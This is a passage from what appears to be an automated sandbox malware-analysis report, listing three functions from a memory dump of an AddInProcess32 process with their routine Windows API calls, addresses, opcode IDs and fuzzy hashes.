                                                                                                    • Opcode Fuzzy Hash: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
                                                                                                    • Instruction Fuzzy Hash: 5CC08034C0020C77CB00F6E1C907C8D773C5D04300F405416B51091081E774531D96D5
                                                                                                    APIs
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433044
                                                                                                      • Part of subcall function 00432F76: std::exception::exception.LIBCONCRT ref: 00432F83
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00433052
                                                                                                      • Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                    • String ID: P@
                                                                                                    • API String ID: 1586462112-676759640
                                                                                                    • Opcode ID: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
                                                                                                    • Instruction ID: 865ee2ddef0a897f612f6fb2ad11127a6c44acc13293d016e759f8d59b40e8c3
                                                                                                    • Opcode Fuzzy Hash: 0f635586152ab29110567b9c987066954b21ef4f476975f95e78209acc4c7d60
                                                                                                    • Instruction Fuzzy Hash: 15C08034C0010CB7CB00FAF5D907D8E773C5904340F409015B61091041E7B8631C87C5
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D35), ref: 0043B4DB
                                                                                                    • GetLastError.KERNEL32 ref: 0043B4E9
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043B544
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1717984340-0
                                                                                                    • Opcode ID: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
                                                                                                    • Instruction ID: 0ecaebee41cb6558e50c6262f5020644a21471e748dd5a13caac6b8f2b864e38
                                                                                                    • Opcode Fuzzy Hash: 570887f611a5d1f74d34073c32c2f77717d7cd84bcf1f9b239cc9e46d00ed125
                                                                                                    • Instruction Fuzzy Hash: AD411630600205BFDB229F65D844B6B7BB4EF09328F14516EFA59AB3A1DB38CD01C799
                                                                                                    APIs
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 004105F1
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 004106BD
                                                                                                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004106DF
                                                                                                    • SetLastError.KERNEL32(0000007E,00410955), ref: 004106F6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 4100373531-0
                                                                                                    • Opcode ID: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                                                                                    • Instruction ID: 0e21605053d2ba8273329305491efaf700724209343246308e891da9604144dc
                                                                                                    • Opcode Fuzzy Hash: 9879e5f97f9034714067de51e7f9b75c8f83f84791738768acf52853c1cf03dd
                                                                                                    • Instruction Fuzzy Hash: 73417C71644305DFE7208F18DC84BA7B7E4FF88714F00442EE54687691EBB5E8A5CB19